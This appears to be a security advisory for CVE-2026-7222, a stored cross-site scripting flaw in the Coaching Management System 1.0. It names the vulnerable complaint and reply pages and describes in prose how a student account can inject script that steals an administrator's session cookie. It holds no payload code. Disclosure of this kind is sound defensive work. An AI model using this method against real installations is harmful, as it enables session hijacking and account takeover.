CVE-2026-7222

Vulnerability

Overview A stored cross-site scripting (XSS) vulnerability exists in the Coaching Management System 1.0 from code-projects. The flaw resides in the complaint submission functionality (file /cims/modules/student/complaint.php) and the related reply feature. User input in the complaint and reply fields is not properly sanitized before being stored and later rendered in the admin panel (/modules/admin/incomingcomplaint.php) and student views [1]. This is a classic case of CWE-79: Improper Neutralization of Input During Web Page Generation.

Exploitation

Path An attacker with a low-privileged student account can submit a malicious JavaScript payload in the complaint field. When an administrator or teacher views the complaint, the payload executes automatically in their browser. For example, a payload can exfiltrate the session cookie (PHPSESSID) to an attacker-controlled server. Similarly, an admin can inject script in replies that executes in student sessions, enabling reverse XSS [1]. The attack requires no special privileges beyond a standard user account and can be performed remotely.

Impact

Successful exploitation allows the attacker to steal session cookies of higher-privileged users. With the admin’s session cookie, the attacker can hijack the admin session, gaining full control over the application. This can lead to account takeover, data exfiltration, and further malicious actions within the system. The PoC provided in the advisory confirms JavaScript execution and cookie theft in the admin panel [1].

Mitigation

Status As of the vulnerability disclosure, no patch has been released by the vendor. The software appears to be in a maintenance-only state. Users are advised to implement input sanitization and output encoding, or consider replacing the system. The exploit has been publicly disclosed and is likely to be used in attacks [1].